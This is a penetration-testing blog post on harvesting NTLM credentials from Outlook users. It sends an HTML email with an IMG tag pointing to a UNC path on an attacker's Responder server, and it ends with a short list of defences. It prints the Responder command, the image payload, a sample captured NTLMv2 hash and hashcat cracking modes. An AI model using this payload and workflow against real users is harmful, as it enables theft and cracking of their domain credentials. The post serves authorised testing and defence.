Responder IMG SRC


I haven’t seen too many blog posts on this topic, but I can assure you it’s not particularly original. It is, however, extremely helpful for obtaining credentials during a pentest.

Imagine you’re trying to gain access to a client’s remote access tool (e.g. VPN, Citrix, VMware View), but you don’t have any credentials yet. You can try your luck and see if you can capture a Net-NTLMv1/Net-NTLMv2 challenge-response to crack offline. Note that what you capture is the client’s response to Responder’s challenge, not the user’s NT hash, so it can’t be used for pass-the-hash; it has to be cracked.


Much like using Responder in any other situation, you can use it to trick the Outlook email client into participating in an NTLM challenge-and-response: when Outlook renders an image whose source is a UNC path, Windows connects to that host over SMB and automatically authenticates with the logged-on user’s domain credentials. This requires outbound SMB (TCP 445) to be allowed out of the target network, and the user has to allow the download of remote content for the message (Outlook blocks automatic picture download in HTML mail by default).

Here’s a rough diagram of the flow (the original image is not reproduced here; the attacker is shown in red and the target in blue): the target’s Outlook renders the image tag, the OS resolves the UNC path and connects out over SMB to the attacker’s Responder host, the client authenticates with the user’s domain credentials, and Responder records the challenge-response.


Proof of Concept

We will want to get Responder set up on an internet-facing server, with --ip set to that server’s address. --fingerprint and --verbose only add detail to the output; --lm attempts to force an LM hashing downgrade for legacy clients (Windows XP/2003 and earlier).

$ python Responder.py --ip=<public IP of this server> --interface=eth0 --fingerprint --verbose --lm

Next, we embed a reference to the Responder server in an HTML email as an image whose source is a UNC path. Nothing named logo.gif needs to exist on the server; the authentication happens before any file is read.

<IMG SRC="\\<responder host>\logo.gif" ALIGN="bottom" BORDER="0">

If the target opens the email in Outlook (and outbound SMB/CIFS isn’t blocked), the client authenticates to Responder and the capture shows up in its output:

05/07/2017 12:24:49 PM - [SMB] NTLMv2 Client :
05/07/2017 12:24:49 PM - [SMB] NTLMv2 Username : TEST_DOMAIN\test
05/07/2017 12:24:49 PM - [SMB] NTLMv2 Hash : test::TEST_DOMAIN:9294119132765119:E5C9EB55B7336050C2202552E8872582:01010000000000009E6E35D69FC2D2017E987DD0D566E82100000000020000000000000000000000

We can then crack the captured responses offline with hashcat (-m 5600 for NetNTLMv2, -m 5500 for NetNTLMv1) or John the Ripper, using your preferred wordlist/rule combinations. A Net-NTLMv2 response is an HMAC-MD5 over the server challenge and the client’s blob, keyed by a hash of the user’s password, so cracking is simply recomputing it for each candidate password until one matches. With weak passwords this should yield credentials for further activities.


Here are some solutions to this problem:

  • Block SMB/CIFS (TCP 445 and 139) on egress, so the UNC path can never reach the attacker’s host.
  • Leave Outlook’s default of not downloading external content automatically in place, and teach users not to click "Download pictures" on unexpected mail.
  • Implement a more stringent password policy and/or MFA: the captured response is only as strong as the password behind it, and MFA on the remote-access portal means a cracked password alone isn’t enough.